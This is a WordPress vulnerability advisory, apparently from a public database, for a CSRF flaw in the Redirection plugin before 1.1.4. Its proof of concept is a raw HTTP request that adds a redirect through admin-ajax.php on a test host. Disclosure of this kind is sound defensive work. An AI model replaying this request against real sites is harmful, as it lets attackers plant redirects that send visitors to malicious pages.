WordPress Plugin Vulnerabilities
Redirection < 1.1.4 - Redirect Creation via CSRF
Description
The plugin does not add nonce verification in place when adding the redirect, which could allow attackers to add redirects via a CSRF attack.
Proof of Concept
```` POST /wp-admin/admin-ajax.php HTTP/2 Host: sawcup.s2-tastewp.com Cookie: test=test; User-Agent: useragent Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://sawcup.s2-tastewp.com/wp-admin/admin.php?page=irrp-redirection X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 143 Origin: https://sawcup.s2-tastewp.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=irAddRedirect&id=0&from=https%3a%2f%2fsawcup.s2-tastewp.com%2ftest&to=https%3a%2f%2fexample.com%2f&selected=&redirectionType=redirection ````
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Mohamed Selim
Submitter
Mohamed Selim
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-10 (about 1 years ago)
Added
2023-03-10 (about 1 years ago)
Last Updated
2023-03-10 (about 1 years ago)